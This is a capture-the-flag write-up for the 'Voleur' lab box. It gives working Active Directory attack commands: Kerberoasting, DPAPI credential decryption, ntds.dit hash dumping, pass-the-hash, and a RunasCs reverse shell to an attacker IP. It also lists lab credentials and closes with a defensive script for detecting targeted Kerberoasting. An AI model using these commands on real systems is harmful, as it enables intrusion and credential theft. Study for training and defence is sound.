# Voleur

## 0x1 Recon

### Rustscan

### Nmap

## 0x1 Credential xlsx

* Got a hash from the netexec `timeroast` module, but couldn't crack it for now
* Enumerate SMB with nxc

```bash
nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k
nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k --spider IT --content --regex Encrypt
```

* Download the Excel file from the IT share

```bash
nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares -k --get-file 'First-Line Support/Access_Review.xlsx' './Access_Review.xlsx' --share IT
```

* It is password protected, so I cracked the password with `office2john` and `john`
* Some credentials are in there:
* `todd.wolfe:NightT1meP1dg3on14 | svc_ldap:M1XyC9pW7qT5Vn | svc_iis:N5pXyW1VqM7CZ8`

## 0x2 Shell as svc_winrm

* But the user `Todd.Wolfe` has been deleted, so I checked BloodHound and found `svc_ldap` in the `restore_users` group; maybe it can restore the user
* Try a targeted Kerberoast attack via `targetedKerberoast.py`; update `/etc/krb5.conf` first

```bash
sudo vim /etc/krb5.conf
export KRB5CCNAME=/tmp/krb5cc_$(id -u)
python targetedKerberoast.py -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -v -k --dc-host dc.voleur.htb
```

* Crack the hash with `john`
* `svc_winrm:AFireInsidedeOzarctica980219afi`
* Generate the krb5 file

```bash
nxc smb dc.voleur.htb -u svc_winrm -p AFireInsidedeOzarctica980219afi -k --generate-krb5-file krb5.conf
```

* Request a TGT

```bash
getTGT.py voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi
```

* Connect via WinRM as svc_winrm

## 0x3 Restore user (Todd.Wolfe)

* Use `RunasCs` to switch to `svc_ldap`

```bash
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.16.2:4444
rlwrap -cAr nc -lvnp 4444
```

* Check the deleted object

```powershell
Get-ADObject -Filter 'SamAccountName -eq "todd.wolfe"' -IncludeDeletedObjects
```

* Restore the object

```powershell
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
```

* Request a TGT for `todd.wolfe`

```bash
getTGT.py voleur.htb/todd.wolfe:NightT1meP1dg3on14
```

## 0x4 DPAPI

* Following the article below, I used `smbclient.py` to download the file (`/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110`) needed to decrypt the DPAPI master key
* https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets
* Use `dpapi.py` to decrypt the master key (file in `C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SID\$GUID`)

```bash
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
```

## 0x5 Shell as svc_backup

* Decrypt the protected data (file in `C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\`)
* `jermy.combs:qT3V9pLXyN7W4m`

```bash
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
```

* Request a TGT for `jermy.combs`
* SMB again, and got a note and an `id_rsa`
* Now we can SSH as `svc_backup`
* `sudo su` to root

## 0x6 Shell as Administrator

* All C: drive files are under `/mnt`
* Download SYSTEM and ntds.dit
* Use `secretsdump` to dump the hashes
* `Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::`

```bash
scp -r -P 2222 -i id_rsa svc_backup@10.10.11.76:"/mnt/c/IT/Third-Line Support/Backups/Active Directory" .
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -history LOCAL
```

* Request the administrator's TGT

```bash
getTGT.py voleur.htb/administrator -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 -dc-ip 10.10.11.76
```

* Shell as administrator via evil-winrm
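A defender's counterpart to the targeted Kerberoast step in 0x2, added here as an example and not part of the original writeup: it correlates constructed Windows Security events, a 5136 write of `servicePrincipalName` by one account followed by a 4769 TGS request for that same account with RC4 (etype 0x17), which is the pattern `targetedKerberoast.py` leaves behind. The event records, account names and time window are constructed assumptions, not real log data from the box.

```python
"""Correlate SPN writes (5136) with RC4 service-ticket requests (4769)."""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                 # weak etype that makes offline cracking practical
SPN_ATTR = "servicePrincipalName"

# Constructed sample events (simplified field names, not raw EVTX output).
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-01-01T10:00:00", "subject": "svc_ldap",
     "object": "CN=svc_winrm,OU=Users,DC=voleur,DC=htb",
     "attribute": SPN_ATTR, "op": "added"},
    {"id": 4769, "time": "2024-01-01T10:00:20", "subject": "svc_ldap",
     "service": "svc_winrm", "etype": RC4_HMAC},
    {"id": 4769, "time": "2024-01-01T10:05:00", "subject": "alice",
     "service": "DC01$", "etype": "0x12"},        # AES, normal traffic
    {"id": 4769, "time": "2024-01-01T11:00:00", "subject": "bob",
     "service": "svc_sql", "etype": RC4_HMAC},    # RC4 but no prior SPN write
]


def _cn(dn):
    """Return the CN value of a distinguished name (its first RDN)."""
    return dn.split(",")[0].split("=", 1)[1]


def find_targeted_kerberoast(events, window_seconds=300):
    """Return (actor, victim) pairs where the actor added an SPN to the victim
    and then requested an RC4 service ticket for it within the window."""
    ts = lambda e: datetime.fromisoformat(e["time"])
    spn_writes = [e for e in events if e["id"] == 5136
                  and e["attribute"] == SPN_ATTR and e["op"] == "added"]
    hits = []
    for req in events:
        if req["id"] != 4769 or req["etype"] != RC4_HMAC:
            continue
        for w in spn_writes:
            same_actor = w["subject"] == req["subject"]
            same_victim = _cn(w["object"]).lower() == req["service"].lower()
            delta = ts(req) - ts(w)
            if same_actor and same_victim and \
                    timedelta(0) <= delta <= timedelta(seconds=window_seconds):
                hits.append((req["subject"], req["service"]))
    return hits


def rc4_service_requests(events):
    """Broader, noisier signal: every RC4 TGS request, for analyst review."""
    return [(e["subject"], e["service"]) for e in events
            if e["id"] == 4769 and e["etype"] == RC4_HMAC]
```

Enabling auditing of directory object changes on the DC is what produces 5136; without it only the RC4 ticket requests remain visible.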